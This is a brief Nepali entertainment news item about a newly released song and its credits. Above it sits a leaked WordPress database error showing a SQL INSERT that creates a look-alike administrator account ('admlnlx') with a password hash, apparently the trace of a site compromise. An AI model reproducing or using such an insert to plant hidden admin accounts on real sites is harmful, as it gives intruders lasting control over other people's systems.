WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOHqsi5MDBS8E7fzyipeXUzuh3Bnps.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:58:46', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । चर्चित गायिका जितु लोप्चन र गायक पूर्ण तामाङको आवाजमा रहेको ‘तिन धारा झरना’ बोलको गीत बजारमा आएको छ । म्हार्मेन मिडियाको अफिसियल युटुब च्यानलबाट उक्त गीत सार्वाजानिक गरिएको हो ।
पारिजात रेकर्डिङ स्टुडियोमा रेकर्ड गरिएको उक्त गीतमा सोम लामाको शब्द,एक्का योञ्जनको संगीत रहेको छ् भने गीतलाई कर्साङ लामाले संगीत संयोजन, मिक्सिङ गरेका हुन ।